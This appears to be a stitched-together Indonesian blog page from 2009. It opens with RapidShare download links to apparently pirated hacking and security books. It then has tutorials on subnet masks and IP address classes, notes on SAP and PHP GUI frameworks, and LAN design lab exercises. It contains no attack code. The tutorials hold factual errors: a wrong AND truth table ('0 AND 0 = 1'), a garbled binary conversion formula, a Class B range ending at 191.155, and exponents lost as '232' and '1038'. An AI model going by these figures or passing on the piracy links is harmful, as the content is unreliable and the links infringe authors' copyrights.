http://rapidshare.de/files/2369872/Hacking_Exposed-_Web_Applications__MCGraw-...

Hacking Exposed- Windows 2003 Chapter 5.pdf 916kbs
http://rapidshare.de/files/2369895/Hacking_Exposed-_Windows_2003_Chapter_5.pd...

Hacking for Dummies (John Wiley-2004).pdf 9.50megs
http://rapidshare.de/files/2369943/Hacking_for_Dummies__John_Wiley-2004_.pdf....

Hacking Guide v3.1[www.netz.ru].pdf 1.22megs
http://rapidshare.de/files/2382155/Hacking_Guide_v3.1_www.netz.ru_.pdf.html

Hacking-The Art of Exploitation(No Starch-2003).chm 1.43megs
http://rapidshare.de/files/411679/Hacking_-_The_Art_of_Exploitation.chm.html

How Thieves Targeted eBay Users but Got Stopped Instead(Interhack-June 2003).pdf 200kbs
http://rapidshare.de/files/2382182/How_Thieves_Targeted_eBay_Users_but_Got_St...

Malware - Fighting Malicious Code (Prentice Hall-November 21 2003).chm 6.49megs
http://rapidshare.de/files/2382239/Malware_-_Fighting_Malicious_Code__Prentic...

Maximum Security, 3rd Edition(Sams-April 2001).chm 2.21megs
http://rapidshare.de/files/2382271/Maximum_Security__3rd_Edition_Sams-April_2...

Maximum Security_-A Hackers Guide to Protect Your Internet .chm 1.31megs
http://rapidshare.de/files/2382285/Maximum_Security_-A_Hackers_Guide_to__Prot...

Network Security Tools (OReilly- Apr 2005).chm 1.32megs
http://rapidshare.de/files/2382318/Network_Security_Tools__OReilly-_Apr_2005_...

PC Hacks(Oct 2004).chm 6.10megs
http://rapidshare.de/files/1437885/OReilly.PC.Hacks.Oct.2004.eBook-DDU.chm.html

PDF Hack(Aug 2004).chm 3.61megs
http://rapidshare.de/files/1693887/OReilly.PDF.Hacks.Aug.2004.eBook-DDU.chm.html

Practical Study Remote Access (Cisco-December 22, 2003).chm 2.50megs
http://rapidshare.de/files/2382422/Practical_Study_Remote_Access__Cisco-Decem...

Reversing Secrets of Reverse Engineering (Apr 2005).pdf 8.37megs
http://rapidshare.de/files/2369197/Wiley.Reversing.Secrets.of.Reverse.Enginee...

Secrets To Winning Cash Via Online Poker.pdf 233kbs
http://rapidshare.de/files/2394511/Secrets_To_Winning_Cash_Via_Online_Poker.p...

Spidering Hacks(O'Reilly- October 2003).chm 1.38megs
http://rapidshare.de/files/1000252/OReilly.Spidering.Hacks.chm.html

Stealing the Network; How to Own the Box ( Syngress-2003).pdf 4.58megs
http://rapidshare.de/files/714044/Stealing_the_Network_How_to_Own_the_Box.pdf...

The Art of Deception by Kevin Mitnick.pdf 5.19megs
http://rapidshare.de/files/2394816/The_Art_of_Deception_by_Kevin_Mitnick.pdf....

The Art of Intrusion-The Real Stories Behind the Exploits of Hackers Intruders and Deceivers (Wiley- Feb 2005).pdf 3.06megs
http://rapidshare.de/files/985113/The_Art_of_Intrusion.pdf.html

The Complete History of Hacking.pdf 135kbs
http://rapidshare.de/files/2394847/The_Complete_History_of_Hacking.pdf.html

Tricks of the Internet Gurus (April 1999).pdf 5.66megs
http://rapidshare.de/files/2394924/Tricks_of_the_Internet_Gurus__April_1999_....

Underground Hacking Madness & Obsession on the Electronic Frontier.pdf 1.47megs
http://rapidshare.de/files/2394936/Underground_Hacking_Madness___Obsession_on...

Web Hacking- Attacks and Defence (Pearson Education-August 08, 2002).chm 6.32megs
http://rapidshare.de/files/2394976/Web_Hacking-_Attacks_and_Defence__Pearson_...

Windows Server Hack(O'Reilly - March 2004).chm 1.82megs
http://rapidshare.de/files/1693872/OReilly.Windows.Server.Hacks.eBook-DDU.chm...

Windows XP Hacks (O'reilly- Auguest 2003).chm 5.18megs
http://rapidshare.de/files/1693126/O_Reilly_-_Windows_XP_Hacks.chm.html

Rabu, 21 Januari 2009

subnetmask







Network ID dan Host ID di subnet mask
Apa itu subnet-mask?……, Menurut mbah wiki subnet-mask itu adalah metode untuk menghilangkan atau menopengi jatah(istilah yang kacau) network address dan IP Address. jika anda bingung untuk mengerti bahasa saya coba tanya langsung ke mbah wiki mungkin anda akan lebih mengerti klo dia langsung yang menjelasi.
IP address itu sendiri terdiri dari dua bagian yaitu network id dan host id, jadi fungsi dari subnet-mask ini untuk menentukan sebatas mana network anda dan berapa host yang bisa anda pake pada network anda tersebut.
Karena komputer hanya mengerti 0 dan 1 (bego ya?), atau bilangan biner maka subnet-mask itu di bentuk menggunakan bilangan biner. Subnet-mask terdiri dari 4 byte dan karena 1 byte = 8 bit, maka subnet-mask tersebut terdiri dari 32 bit.
beginilah bentuk subnet-mask yang di baca oleh komputer 11111111.11111111.11111111.11111111, karena manusia akan repot jika membaca biner, akhirnya komputer meng-conversi-nya ke bilangan desimal ketika akan di tampilkan ke user(kita-kita nih), *buka kalkulator sciencetific* jadi hasil bilangan biner yang di atas setelah kita conversi-kan ke desimal adalah 255.255.255.255(gampang bukan, emang gampang untuk conversi biner ke desimal dengan menggunakan kalkulator).
Anda bisa dengan mudah menconversi biner ke desimal atau sebaliknyaa dengan menggunakan kalkulator sciencetific, bila terlalu mahal untuk membelinya, jika anda pengguna windows, anda bisa mendapatkannya di start menu—> programs —> accessories—>calculator, di calculator anda pilih menu view lalu pilihlah sciencetific.
Tapi walaupun sangat mudah menggunakan kalkulator, ada baiknya klo kita juga tahu bagaimana cara mengkonversinya secara manual, tapi jika anda tidak membutuhkannya ya gak masalah he..he..he, tapi mungkin ada yang lain juga pingin tahu caranya melakukannya tanpa bantuan kalkulator sciencetific,
seperti yang kita ketahui 1 byte itu adalah 8 bit, jadi jika kita tuliskan satu byte maka dalam binernya seperti ini :
1 1 1 1 1 1 1 1
untuk meng-konversi bilangan biner di atas menjadi bilangan desimal, yang perlu kita lakukan adalah mengalikan semua bilangan dengan 2 lalu hasilnya kita pangkatkan, bilangan paling kanan di pangkatkan dengan 0, bilangan kedua dari kanan dengan 1 bilangan ketiga dengan 2 dan seterusnya, mari kita lakukan :
(2 x 1) pangkat 0 = 1
(2 x 1) pangkat 1 = 2
(2 x 1) pangkat 2 = 4
(2 x 1) pangkat 3 = 8
(2 x 1) pangkat 4 = 16
(2 x 1)pangkat 5 = 32
(2 x 1)pangkat 6 = 64
(2 x 1)pangkat 7 = 128
jadi jika kita jumlahkan 1 + 2 + 4 + 8 + 16 + 32 + 64 + 128 = 255
seumpama contoh
1 0 1 0 1 0 0 0
maka,
(2 x 0) pangkat 0 = 0
(2 x 0) pangkat 1 = 0
(2 x 0) pangkat 2 = 0
(2 x 1) pangkat 3 = 8
(2 x 0) pangkat 4 =0
(2 x 1) pangkat 5 = 32
(2 x 0) pangkat 6 = 0
(2 x 1) pangkat 7 = 128
jadi totalnya adalah : 0 + 0 + 0 + 8 + 0 +32 + 0 + 128 = 168
Tapi bagaimanapun contoh sangat di perlukan untuk memperlajari sesuatu, makanya kita akan memulai dengan contoh, anggap kita mempunyai ip kelas c yaitu 192.168.0.0, dengan memberikan subnetmask 255.255.255.0 maka kita akan mendapatkan 256 ip, satu akan di gunakan sebagai network yaitu 192.168.0.0 dan yang satunya lagi di pakai buat broadcast 192.168.0.255, jadi anda mempunyai 254 ip yang bisa di gunakan oleh user anda.
catatan : dalam subnet-mask ini, bit 1 berarti terisi dan bit 0 berarti kosong.
Supaya kita gak bingung, kita akan membahas gimana kita bisa mendapatkan yang di atas. karena komputer hanya mengerti biner, lebih baik kita membahasnya dengan biner pula,
192.168.0.0 = 11000000.10101000.00000000.00000000
255.255.255.0 = 11111111.11111111.11111111.00000000
sekarang kita telah memiliki ip dan subnet yang telah di konversi ke biner. sekarang mari kita AND (’&’) kan mereka. baik sebelonya kita lihat status AND untuk biner dulu :
1 AND 1 = 11 AND 0 = 00 AND 1 = 00 AND 0 = 1
maka,
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0.0 0 0 0 0 0 0 0
1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 0 0 0 0 0 0 0 0=yang akan menjadi network1 1 0 0 0 0 0 0 .1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 0 0 0 0 0 0 0 = 192.168.0.0
dari contoh di atas, kita ingin mencari di mana bagian network dan host dari ip tersebut. Kita mengambil bit 1 terakhir dari subnet-mask yang menjadi acuan, jadi :
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0.0 0 0 0 0 0 0 0
1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 0 0 0 0 0 0 0 0
setelah kita and kan mereka akhirnya kita mendapatkan
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0.0 0 0 0 0 0 0 0 ———> network
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0.¦1 1 1 1 1 1 1 1 ——–> broadcast
catata, untuk mencari network yang di belakang batasan tadi di gantikan dengan 0 semua, dan untuk broadcast kita gantikan dengan 1 semua, tanda ini di ambil ‘ ‘ dengan paktokan 1 terakhir pada subnet kita.
jadi sisa ip di antara 0 dan 255 itu bisa di pakai oleh user anda yaitu 1 sampai dengan 254.
masih bingung?????????
oke kita buat satu lagi contoh
Pada contoh ini kita akan tetap menggunakan ip 192.168.0.66 dengan subnet 255.255.255.192, jadi
ip
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 1 0 0 0 1 0
subnet-mask
1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 0 0 0 0 0 0
jadi angka 1 terakhir dari subnet-mask jadi acuan kita, setelah kita meng AND mereka
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 1 0 0 0 0 1 0
1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 0 0 0 0 0 0
sama dengan,
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 1 0 0 0 0 0 0 = network
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 1 1 1 1 1 1 1 = broadcast
jadi kita mendapatkan 192.168.0.64 sebagai network dan 192.168.0.127 sebagai broadcast.
memang agak memusingkan, tapi akan semakin mudah jika anda biasa menggunakannya.
Prefix Subnet-mask
Mungkin anda pernah menjumpai ip yang seperti ini 192.168.0.1/24, ini sama saja jika kita tulis 192.168.0.1 dengan subnetnya 255.255.255.0 (mank….I need demank).
192.168.0.1/24, jadi /24 di sini bahasa kerennya Prefix sebenarnya saya tahu juga dari demank ketika lagi ngopi di solong(ini bukan lyric nyanyi Gary Moore), lagi ngomong2 dia bilang klo ada /24 itu namanya Prefix.
Bagi yang belon ngerti dengan cara menentukan Prefix ini saya akan coba membantu sebisa saya, jadi seperti yang kita bahas di atas, klo subnet itu mempunya 32 bit. jadi Prefix itu sendiri di ambil dari bit-bit subnet tadi, jadi klo ada subnet 255.255.0.0 itu berarti /16 karena 255.255.0.0 jumlah bitnya adalah 16.
saya rasa kita tidak punya masalah dengan Prefix lagi, soalnya paragraf di atas itu sudah cukup menjelaskan.
Menentukan Jumlah network dalam subnet class C
jadi kalo kita kita menggunakan 192.168.1.1/25, atau sama dengan 192.168.1.1 255.255.255.128 , disini kita membelah class C menjadi 2 bagian yaitu dari 0 sampai 127 dan 128 sampai 255. jadi kita mempunya network id 192.168.1.0 dan broadcast 192.168.1.127 dan satu lagi network 192.168.1.128 dan 192.168.1.255 untuk broadcastnya.
untuk mengetahui jumlah block subnet kita menggunakan formula 2 pangkat dengan n, yang mana n itu adalah jumlah satu pada block ke empat jika kita menggunakan subnet mask pada class C, tapi jika pada class B kita n itu adalah jumlah angka 1 pada block 3 dan 4, dan jika pada class A maka n adalah jumlah angka 1 pada block 2, 3 dan 4.
jadi pada contoh di atas, class c mempunyai netmask 255.255.255.0 jika kita melakukan subnet pada class c, seumpama kita menggunakan 255.255.255.192 berarti kita meminjam 2 bit, karena secara biner netmask di atas kita tulis,
1 2 3 411111111.11111111.11111111.00000000
jadi untuk mengubahnya ke menjadi 255.255.255.192 kita harus meminjamkan dua bit,
11111111.11111111.11111111.11000000,
sekarang kita melihat ada dua angka 1 pada block ke 4, jadi nilai angka n adalah 2, sekarang masukan ke formula 2 pangkat n, jadinya 2 pangkat 2 = 4. jadi kita mempunya 4 block subnet sekarang ini. jadi klo kita menggunakan ip 192.168.1.0.
untuk menghitung jumlah host pada jaringan kita di dengan subnet class C, anda bisa menggunakan formula ini, 2 pangkat angka 0 pada block ke 4 dan di kurang dengan 2 .
jadi pada contoh di atas, (2 pangkat 6) yaitu 64 lalu di kurang 2, jadinya 62 host yang bisa kita gunakan per block subnet.
setelah kita mendapatkan berapa jumlah block subnet kita, kita juga telah mendapatkan berapa host, sekarang kita bisa menentukan yang mana network id dan broadcast id pada contoh di atas dan kita tulis pada table berikut ini.



sampai di sini tulisan saya ini, ini sebenarnya saya tulis untuk mengingatkan saya tentang subnet ini. jika yang salah dari tulisan saya ini, saya sangat berharap petunjuknya dari anda.

keals ip

1. Apa itu IP address?
Bagaimana komputer-komputer yang terhubung ke jaringan internet saling berhubungan dan mengirimkan pesan? Masalah ini analog dengan masalah pengiriman surat di dunia nyata. Misalkan saya yang berdomisili di Aquarius 16 Bandung ingin mengirim surat kepada Hifni yang beralamat di jalan xxx no 100 Condongcatur Sleman. Pertama, saya akan menuliskan isi surat saya dalam sebuah kertas. Lalu surat tersebut akan saya masukkan ke dalam amplop. Mengapa saya masukkan ke dalam amplop? Agar surat saya terlindung. Dengan menggunakan amplop, resiko kerusakan surat saya akan lebih kecil daripada tidak menggunakan amplop. Setelah itu akan saya tuliskan alamat Hifni pada amplop surat tersebut, dan tak lupa nama Hifni, karena jika tidak dituliskan namanya, surat tersebut bisa nyasar ke kakak atau adiknya. Saya juga menuliskan nama dan alamat saya pada bagian belakang amplop, agar apabila Hifni ingin membalas surat saya, dia mengetahui alamat saya. Apabila alamat surat tersebut benar, prangkonya cukup, dan rute menuju rumah Hifni bisa dilalui, surat tersebut pasti akan sampai.

Pada kuliah pertama ini kita akan membahas salah satu komponen penting dalam jaringan komputer. Komponen itu adalah IP (Internet Protocol) address, yang analog dengan alamat rumah pada pengiriman surat di atas. IP address (versi 4) tersusun atas bilangan biner (0 dan 1) sepanjang 32 bit (binary digit) yang terbagi atas empat segmen. Tiap segmen terdiri atas 8 bit. Artinya memiliki nilai desimal 0 (00000000) sampai 255 (11111111). Jadi secara kasar dapat disimpulkan bahwa jumlah alamat yang bisa dipakai oleh komputer di seluruh dunia yang terhubung ke internet sebanyak 232 buah (walaupun ada IP tertentu yang tidak dipakai dengan alasan khusus). Untuk mempermudah pembacaan, alamat IP tersebut biasanya dituliskan dalam bilangan desimal misalnya 167.205.35.31. Struktur alamat IP dibagi menjadi dua bagian yaitu Network ID dan Host ID. Sesuai namanya, Network ID berfungsi mengidentifikasi pada jaringan mana suatu komputer berada, sementara Host ID berfungsi mengidentifikasi suatu komputer (host) pada suatu jaringan. Dalam satu jaringan, host ID harus unik, sebagaimana analogi dalam satu jalan, tidak boleh ada rumah dengan nomor sama. Jaringan yang berbeda network idnya dipisahkan oleh router.
2. Kelas-kelas IP address
IP address dibagi menjadi lima kelas, A sampai E. IP address yang dipakai secara umum dibagi dalam 3 kelas, sementara 2 kelas lainnya dipakai untuk kepentingan khusus. Ini untuk memudahkan pendistribusian IP address ke seluruh dunia.
Kelas A :
- Format : 0nnnnnnn.hhhhhhhh.hhhhhhhh.hhhhhhhh
- Bit pertama : 0
- Panjang Network ID : 8 bit
- Panjang Host ID : 24 bit
- Byte pertama : 0 – 127
- Jumlah : 126 kelas A (0 dan 127 dicadangkan)
- Range IP : 1.xxx.xxx.xxx sampai 126.xxx.xxx.xxx
- Jumlah IP : 16.777.214 IP address pada tiap kelas A
IP address kelas ini diberikan kepada suatu jaringan yang berukuran sangat besar, yang pada tiap jaringannya terdapat sekitar 16 juta host.
Kelas B :
- Format : 10nnnnnn.nnnnnnnn.hhhhhhhh.hhhhhhhh
- 2 bit pertama : 10
- Panjang Network ID : 16 bit
- Panjang Host ID : 16 bit
- Byte pertama : 128 – 191
- Jumlah : 16.384 kelas B
- Range IP : 128.0.xxx.xxx sampai 191.155.xxx.xxx
- Jumlah IP : 65.535 IP address pada tiap kelas B
IP address kelas ini diberikan kepada jaringan dengan ukuran sedang-besar. Contohnya adalah jaringan kampus ITB yang mendapat alokasi IP address kelas B (terima kasih kepada Onno W. Purbo), dengan network id 167.205.
Kelas C :
- Format : 110nnnnn.nnnnnnnn.nnnnnnnn.hhhhhhhh
- 3 bit pertama : 110
- Panjang Network ID : 24 bit
- Panjang Host ID : 8 bit
- Byte pertama : 192 – 223
- Jumlah : 2.097.152 kelas C
- Range IP : 192.0.0.xxx sampai 223.255.255.xxx
- Jumlah IP : 254 IP address pada tiap kelas C
IP kelas ini dialokasikan untuk jaringan berukuran kecil.
IP kelas D digunakan sebagai alamat multicast yaitu sejumlah komputer memakai bersama suatu aplikasi. Contohnya adalah aplikasi real-time video conference yang melibatkan lebih dari dua host, seperti yang diadakan di ITB dalam program SOI (School on Internet) bersama beberapa universitas di Asia. Ciri IP kelas D adalah 4 bit pertamanya 1110. IP kelas E (4 bit pertama 1111) dialokasikan untuk keperluan eksperimental.
3. Yang perlu diperhatikan dalam pemilihan IP address
Aturan dasar pemilihan Network ID dan Host ID :
- Network ID tidak boleh bernilai 127. Karena Network ID 127 digunakan sebagai alamat loopback yaitu alamat yang digunakan komputer untuk menunjuk dirinya sendiri.
- Network ID dan Host ID tidak boleh seluruhnya bernilai 255 (seluruh bit diset 1). Nework ID atau Host ID yang seluruhnya bernilai 255 adalah alamat broadcast jaringan tersebut. Apabila dikirimkan pesan kepada alamt broadcast maka seluruh host pada jaringan tersebut akan menerima pesan itu.

- Network ID dan Host ID tidak boleh seluruhnya bernilai 0 (seluruh bit diset 0). Alamat IP dengan host id semuanya bernilai 0 diartikan sebagai alamat network yang menunjuk ke jaringan, bukan ke host.
- Host ID harus unik dalam satu network.
4. Penutup
Jadi, dengan semakin berkembangnya pengguna internet, alamat IP yang tersedia pun semakin sedikit. Perancang IP address dulu tidak menyangka bahwa perkembangan internet akan sedemikian pesat. Lalu bagaimana solusinya? Ada beberapa alternatif yang kini tengah dilakukan. Pertama melakukan penghematan pemakaian IP address dengan cara Subnetting, Supernetting, NAT, dll. Kedua, melakukan migrasi dari IP versi 4 ke IP versi 6 yang mempunyai alokasi sampai 3,4 x 1038.

Untuk melihat konfigurasi IP Anda, buka command prompt (Windows) lalu ketikkan ipconfig /all, lalu tekan enter. Untuk UNIX, buka shell/terminal lalu ketikkan ifconfig lalu tekan enter. IP address pada komputer dapat ditentukan secara static maupun dynamic. Penentuan secara static dilakukan dengan mengeset alamat IP pada komputer secara langsung. Sedangkan penentuan secara dynamic dilakukan dengan menggunakan dial up ke ISP (internet service provider) atau dengan cara menghubungkan diri dengan server DHCP (Dynamic Host Configuration Protocol). Sebagai contoh, komputer di lab Informatika Dasar I Teknik Informatika ITB mendapatkan IPnya secara dynamic melalui server ns.if.itb.ac.id sehingga alamat IPnya pada suatu saat bisa berubah secara otomatis. Keuntungan menggunakan DHCP adalah mampu mencegah IP conflict atau terdapatnya IP address yang sama pada satu jaringan.
5. Referensi
- Onno W. Purbo, Adnan Basalamah, Ismail Fahmi, Achmad Husni Thamrin. TCP/IP Standar, Desain, dan Implementasi.2002.Elex Media Komputindo:Jakarta.
- Aulia K. Arif, Onno W. Purbo. Konsep IP Address di Internet.
- Wahyu Hidayat, Affan Basalamah, Dikshie Fauzie. IPv6 di ITB.

GUI


SAP GUI Java Di Open SuSe 10.2

Ada kecenderungan SAP memasukkan fitur-fitur yang dimiliki bahasa Java kedalam ABAP. Berikut ini adalah langkah-langkah bagaimana menginstall SAP R/3 with java pada Open SuSe 10.2.

Apa itu SAP? SAP singkatan dari System Application and Product in data processing. Adalah
aplikasi untuk mempermudah perusahaan untuk men-support segala kegiatan operasional dan
produksi secara efektif dan efisien. Sebenarnya banyak produk-produk SAP ini, tapi yang paling
terkenal adalah SAP R/3 yang merupakan aplikasi yang memberikan solusi terhadap konsep
ERP (Enterprise Resource Planning).

Apa itu ABAP? ABAP adalah suatu bahasa pemrograman yang pertama kali dikembangkan
pada tahun ‘80an. Awalnya diperuntukan sebagai bahasa untuk laporan (report language) khusus
untuk SAP R/2 (Sistem SAP yang jalan di komputer mainframe) yang merupakan platform yang
memungkin perusahaan besar mengembangkan aplikasi bisnis untuk logistik dan keuangan.


PHP dan Aplikasi GUI
Saat ini kita dapat menemukan beberapa solusi yang dapat digunakan untuk membangun aplikasi GUI dengan menggunakan PHP. Solusi yang ada dan cukup banyak dikenal saat ini adalah: PHP-GTK, WinBinder, dan PHP-QT.

Sayangnya, walaupun solusi untuk pembangunan aplikasi GUI menggunakan PHP sudah tersedia, kita masih "belum" dapat menemukan aplikasi GUI komersial berskala enterprise yang dibangun dengan menggunakan PHP. Mengapa hal ini bisa terjadi? Beberapa penyebab yang mendasari minimnya penggunaan PHP dalam pembangunan aplikasi GUI adalah sebagai berikut.


Belum mature-nya solusi yang ada. Hal ini menyebabkan developer enggan untuk menggunakan PHP untuk membangun aplikasi GUI komersial
Perkembangan dari solusi-solusi tersebut masih kurang cepat
Tingkat kesulitan pembangunan aplikasi GUI menggunakan PHP masih relatif tinggi
Kemampuan yang dimiliki PHP untuk pembangunan aplikasi GUI masih jauh tertinggal jika dibandingkan dengan bahasa pemrograman lain yang sudah lebih dahulu digunakan untuk pembangunan aplikasi GUI, misalnya Java, C# dan C++
Serta berbagai alasan lainnya
Untuk menjawab berbagai masalah tersebut di atas, saat ini tengah dikembangkan sebuah solusi baru untuk membantu pembangunan aplikasi GUI menggunakan PHP. Solusi baru tersebut adalah Klorofil Platform. Klorofil Platform dibangun oleh suatu komunitas yang bernama Klorofil Collaboration Project atau dikenal juga dengan nama Klorofil. Di dalam Klorofil Platform terdapat sebuah GUI framework yang bernama gambArt. GUI framework inilah yang dapat kita gunakan untuk membangun aplikasi GUI menggunakan PHP.

Sebelum kita membahas lebih lanjut mengenai Klorofil Platform, gambArt, dan lain sebagainya, kita akan melihat terlebih dahulu salah satu aplikasi yang dibangun menggunakan gambArt.


Gambar kalkulator yang anda lihat adalah dibangun dengan menggunakan PHP dan gambArt.
Kesimpulan
Dari artikel ini, kita dapat melihat bahwasanya kita telah dapat menggunakan PHP untuk membangun aplikasi GUI dengan menggunakan GUI framework dari Klorofil Platform yang bernama gambArt. Saat ini, gambArt juga sudah menyediakan berbagai komponen dasar yang cukup lengkap.

Pada versi-versi berikutnya, Klorofil akan terus berusaha untuk menambahkan komponen-komponen lainnya. Selain itu, pembangunan GUI builder akan menjadi salah satu prioritas utama. Dengan adanya GUI builder, pembangunan aplikasi dengan gambArt akan menjadi jauh lebih mudah.

Tentunya, artikel ini hanyalah berisi gambaran umum dari Klorofil Platform dan gambArt. Informasi lebih lanjut mengenai Klorofil Platform dapat dilihat di website Klorofil dan dokumentasi yang tersedia secara online.

Jika Anda menginginkan informasi dan tutorial mengenai Klorofil Platform dalam bahasa Indonesia, Anda dapat mengunjungi Saltanera DevSpace. Saltanera DevSpace merupakan website yang disediakan bagi komunitas developer.

Langkah Selanjutnya ...
Dapatkan informasi lebih lanjut dengan mengunjungi website Klorofil
Download Klorofil Platform beserta contoh aplikasi di Klorofil Download Center
Kunjungi Klorofil Online Documentation untuk mengetahui lebih jauh mengenai Klorofil Platform dan cara pemakaiannya
Mendaftarlah pada atau Klorofil Feed untuk mendapatkan notifikasi release baru maupun update website Klorofil
Bergabung dengan Klorofil Forum untuk mengajukan/menjawab pertanyaan-pertanyaan seputar gambArt
Cobalah untuk membangun aplikasi sederhana dengan menggunakan gambArt
Kirimkanlah deskripsi dari aplikasi yang telah dibuat agar dapat ditampilkan pada website Klorofil

Senin, 19 Januari 2009

LAN

Mendesain suatu LAN yang sederhana untuk 1 atau 2 server dan 2 sampai 12 workstation adalah relatif sangat mudah. Cukup dengan menghubungkan server dan workstation tersebut dengan suatu hub atau switch, maka kita sudah dapat membuat suatu LAN yang dapat bekerja dengan baik. Namun jika workstation berjumlah banyak dan berada di lantai atau gedung yang berlainan, seperti jaringan untuk kampus, perencanaan atau desain suatu LAN tidaklah terlalu mudah. Banyak faktor yang harus kita perhatikan agar LAN dapat bekerja dengan baik .
Untuk mendesain LAN yang kompleks kita dapat mempergunakan desain hirarki. Model Hirarki adalah suatu model untuk mendesain jaringan komputer yang banyak dipakai oleh para perancang jaringan. Dengan model desain hirarki ini, jaringan dibagi di dalam tiga lapisan yang berdiri sendiri-sendiri. Ketiga lapisan model desain hirarki adalah sebagai berikut

Lapisan Inti (Core)

Lapisan ini merupakan tulang punggung (backbone) dari jaringan. Didalam lapisan ini, data diteruskan secepatnya menggunakan metode dan protokol jaringan yang tercepat (high speed).

Lapisan Distribusi (Distribution)

pada lapisan ini, diadakan pembagian atau pembuatan segmen-segmen berdasarkan peraturan yang akan dipakai oleh suatu perusahaan, misalnya jaringan dibagi berdsarkan departemen-departemen

Lapisan Akses

Pada lapisan akses ini, komputer pemakai dihubungkan untuk akses ke jaringan. Pada lapisan ini penyaringan paket data yang lebih spesifik dapat dilakukan untuk mencegah akses ke suatu komputer tertentu

Contoh jaringan dengan model hirarki tampak pada gambar berikut




Latihan 1 (Praktek)

- berdasarkan desain LAN dibawah ini, buatlah 4 kelompok agar dapat merancang
jaringan seperti desain dibawah ini. Gunakan peralatan yang telah tersedia

- masing-masing kelompok disediakan 1 switch, 3 kabel straight-trought, 1 kabel
cross-over dan 3 PC.

- Masing masing kelompok hanya boleh mengatur satu segmen jaringan yang telah
ditentukan

- Hubungkan kabel ke peralatan yang telah tersedia, sehingga masing-masing
kelompok terhubung secara fisik, seperti pada gambar dibawah ini

- Tentukan IP address masing-masing kelompok berdasarkan alamat network 192.168.50.0

- Tentukan nama komputer yang terhubung pada masing-masing segmen.

- Tentukan workgroup pada masing-masing segmen




Latihan 2 (Praktek)

- berdasarkan desain LAN dibawah ini, buatlah 4 kelompok agar dapat merancang
jaringan seperti desain dibawah ini. Gunakan peralatan yang telah tersedia

- masing-masing kelompok disediakan 1 switch, 3 kabel straight-trought, 1 kabel
cross-over dan 3 PC.

- Masing masing kelompok hanya boleh mengatur satu segmen jaringan yang telah
ditentukan

- Hubungkan kabel ke peralatan yang telah tersedia, sehingga masing-masing
kelompok terhubung secara fisik, seperti pada gambar dibawah ini.

- Tentukan IP address masing-masing kelompok berdasarkan alamat network
192.168.100.0

- Tentukan nama komputer yang terhubung pada masing-masing segmen.

- Tentukan workgroup pada masing-masing segmen.